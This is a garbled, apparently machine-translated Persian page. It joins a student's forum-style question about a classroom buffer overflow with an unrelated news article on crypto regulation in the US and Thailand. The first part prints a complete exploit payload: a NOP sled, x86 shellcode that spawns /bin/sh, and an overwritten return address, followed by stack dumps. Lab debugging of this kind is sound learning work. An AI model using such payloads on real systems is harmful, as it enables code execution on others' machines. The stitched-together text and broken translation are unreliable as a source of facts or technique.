سرریز بافر – shellcode تزریقی پس از دستورالعمل ترک خراب شده است

من یک سرریز بافر برای یک کلاس تمرین می کنم و من یک تکه کد دارم که از یک سیستم منبع باز قرض گرفتم. متاسفانه من نمی توانم این کد را فاش کنم.

اطلاعات سیستم من:

 nikel $ uname -a
لینوکس اوبونتو 4.15.0-29-عمومی # 31 ~ 16.04.1-اوبونتو SMP جمعه 18 ژوئیه 10:19:08 UTC 2018 i686 i686 i686 گنو / لینوکس

من از gdbgui برای اشکالزدایی که از طریق pip نصب کردم استفاده میکنم. این نسخه گرافیکی از gdb است.

 nikel $ gdbgui --version
0.13.0.0

بافر من سرشار است، buf اعلام شده حاوی 128 بایت و در 0xbfffe928 وجود دارد. مقادیر به صورت زیر با آرایه اضافه می شوند: buf [len++]، جایی که len در 0xbfffe9a8 است. آدرس برگشت در 0xbfffe9bc .

این شل کد است که من تزریق می کنم:

 " x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x31  xc0  x50  x68  x2f  x2f  x73  x68  x68  x2f  x62  x69  x6e  x89  xe3  x50  x89  xe2  x53  x89  xe1  xb0  x0b  xcd  x80  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x90  x94  x28  xe9  xff  xbf "

در shellcode:

  1. هدف شلختگی، راه اندازی پوسته سیستم / bin / sh است. من آن را مستقیما از https://dhavalkapil.com/blogs/Shellcode-Injection/
  2. x94 کپی کردم که در انتهای آن قرار داده ام، چون آدرسهای حافظه را پر میکنم و به طور مستقیم نوشتن در آدرس بازگشت است که در 0xbfffe9bc .
  3. باز " لازم است که وارد عمل تضعیف شده و بسته شدن " لازم است از این تابع
  4. من فایل را با استفاده از vim -b ویرایش کرده ام و آن را به عنوان یک فایل .bin ذخیره کردم.

این حالت پشته درست قبل از ترک دستورالعمل:

 0xbfffe928: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe930: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe938: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe940: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe948: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe950: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe958: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe960: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe968: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe970: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe978: 0x31 0xc0 0x50 0x68 0x2f 0x2f 0x73 0x68
0xbfffe980: 0x68 0x2f 0x62 0x69 0x6e 0x89 0xe3 0x50
0xbfffe988: 0x89 0xe2 0x53 0x89 0xe1 0xb0 0x0b 0xcd
0xbfffe990: 0x80 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe998: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe9a0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe9a8: 0x99 0x00 0x00 0x00 0x22 0x00 0x00 0x00
0xbfffe9b0: 0xf0 0xef 0xff 0xbf 0x70 0xc1 0x05 0x08
0xbfffe9b8: 0xe8 0xe9 0xff 0xbf 0x28 0xe9 0xff 0xbf

این پشته پس از ترک دستورالعمل:

 0xbfffe928: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe930: 0x90 0x90 0x90 0x90 0x00 0x00 0x00 0x00
0xbfffe938: 0x00 0x37 0xdb 0xb7 0x00 0x00 0x00 0x00
0xbfffe940: 0xa0 0xe5 0xe1 0xb7 0x00 0x00 0x00 0x00
0xbfffe948: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe950: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe958: 0xa9 0xf8 0xe1 0xb7 0x00 0x60 0xf6 0xb7
0xbfffe960: 0x00 0x60 0xf6 0xb7 0x00 0x60 0xf6 0xb7
0xbfffe968: 0x8c 0xe9 0xff 0xbf 0xd6 0xfc 0xe1 0xb7
0xbfffe970: 0x01 0x00 0x00 0x00 0x90 0x90 0x90 0x90
0xbfffe978: 0x6b 0x1e 0xe1 0xb7 0x70 0xc1 0x05 0x08
0xbfffe980: 0x00 0x60 0xf6 0xb7 0xc6 0xfc 0xe1 0xb7
0xbfffe988: 0x70 0xc1 0x05 0x08 0xaf 0xe9 0xff 0xbf
0xbfffe990: 0x00 0x00 0x00 0x00 0x90 0x90 0x90 0x90
0xbfffe998: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe9a0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfffe9a8: 0x99 0x00 0x00 0x00 0x22 0x00 0x00 0xcc
0xbfffe9b0: 0xf0 0xef 0xff 0xbf 0x70 0xc1 0x05 0x08
0xbfffe9b8: 0xe8 0xe9 0xff 0xbf 0x28 0xe9 0xff 0xbf

من نمی فهمم که چرا فضای حافظه buf خراب شده است. اگر برنامه را اجرا کنم، این خطا را به من می دهد:

 برنامه
 دریافت سیگنال SIGSEGV، گسل Segmentation.
0xbfffe928 در ؟؟ ()

EIP دارای مقدار 0xbfffe928 است که صحیح است. gdb می گوید نمی تواند به آدرس 0xbfffe928 دسترسی پیدا کند

کره جنوبی پرده برداری جدید دستورالعمل های تنظیمی برای مبادلات Cryptocurrency

South Korea cryptocurrency

رئیس اوراق بهادار ایالات متحده و تبادل کمیسیون (ثانیه) یک بار دیگر اعلام کرده است که عرضه سکه های اولیه (ICOs) اوراق بهادار و به این ترتیب تنظیم شده باشد. واشنگتن اوراق بهادار بالا تنظیم کننده به نظر می رسد آماده برای گسترش آن نظارت بازار نشانه حتی در حالی که صادر کنندگان امید بستن به خارج از حوزه قضایی ایالات متحده ادامه این بیانیه می آید.

کلیتون سازیاموسیقی زنگی در، باز هم

در سرمایه گذاری در امریکا نشست سالن شهر در آتلانتا در روز چهارشنبه، رئیس کلیتن جی صادر کنندگان رمز obligat چشم انداز خود را هنگام ارائه اوراق بهادار یادآوری.

“Blockchain تکنولوژی باور نکردنی وعده برای اوراق بهادار و سایر صنایع است،” کلیتون، تکنولوژی پشت ICOs روشن است “قوانین در مورد چگونگی جذب سرمایه انجام هنگامی که شما در حال ارائه اوراق. گفت:

بسیاری از آنچه من دیده می شود در ICO یا نشانه و یا ICO فضای امنیتی است ارائه… من بسیار روشن من در مورد آن می دانند.”

کلیتون ICOs را به عنوان اوراق بهادار در مناسبت های مختلف توضیح داده است اما دقت آنها برابر با کلاهبرداری شده است. او علنا اذعان کرد که همه نشانه افزایش می دهد استفاده می شود برای استنباط رفتار اما سرمایه گذاران علیه پروژه های جعلی هشدار داده است.

ثانیه بیشتر دلار مالیات دهندگان به بهتر بازار cryptocurrency طور کلی حاکم بر و ICOs خاص استفاده می کند. اوایل این ماه تعیین شده تنظیم والری Szczepanik به عنوان جدید پرکردن تزار که در آن او حمایت بخش مالی شرکت ها در جنبه های مربوط به دیجیتال دارایی و نوآوری.

ثانیه تایلند پرده برداری جدید رمزنگاری قوانین

با این حال، تلاش های ثانیه مقایسه با تایلند و کمیسیون بورس اوراق بهادار، که گرفتن یک رویکرد بیشتر فعال برای پروژه های جعلی غربالگری کم رنگ. در واقع تایلند ثانیه آماده است به گسترش واحد براي ثبت نام ICO و هماهنگ با دفتر اختصاصی دو اولیه عمومی عرضه می کنند. این شامل استخدام کارکنان بیشتر به سرعت با تقاضا.

تایلند به تازگی پرده برداری مقررات جدید با هدف قرار دادن cryptocurrencies و ICOs. برای ICOs، مقامات اعلام کرده اند که پروژه های جمع آوری کمک باید نظارت خود را عرضه می کنند برای حداقل یک سال در حالی که حفظ حداقل نیاز پایه سرمایه 5 میلیون بات (در حدود $155.000 آمریکا).

حکم جدید نیز اظهار داشت :

“هر ICO ارائه می شود ارائه به نهادی و فوق العاده-بالا ارزش خالص سرمایه گذاران که میزان سرمایه گذاری نامحدود اما سرمایه گذاری است پوش در اضافه 300.000 بات برای خرده فروشی سرمایه گذاری هر نفر و در هر پروژه ICO, و یا بیش از 70 درصد از ارزش کل نشانه های ارائه شده.”

گزارش پست، بانکوک ، پنج ICOs جدید برای ورود به بازار با حداقل 45 بیشتر ثبت نام در حال حاضر انتظار می رود.

تایلند رویکرد پیشگیرانه برای ICOs و پرکردن مقررات سازمان ملل بیشتر می رویم راه خود را به جای تکیه بر عراق برای شکستن زمین را نشان می دهد. سرمایه گذاران هنوز هم طرح روشن از u. s. ثانیه هستند؛ یا کالا سلف بازرگانی کمیسیون (CFTC) در بازارهای داخلی چگونه اداره می شود.

جمع آوری اعانه ICO نزدیک به 5.4 میلیارد دلار از طریق شش ماه اول سال را مطرح و سریع نزدیک شدن به سال گذشته مجموع 6 میلیارد دلار است. با این حال، مقدار کل مطرح در پنج شش ماه گذشته، از جمله کاهش شدید در آوریل کند کرده است.

سلب مسئولیت: نویسنده صاحب bitcoin، Ethereum و دیگر cryptocurrencies. او موقعیت سرمایه گذاری در سکه های اما شرکت در کوتاه مدت و یا معامله در روز.

تصویر ویژه نیت Shutterstock.

فیلترشکن پرسرعت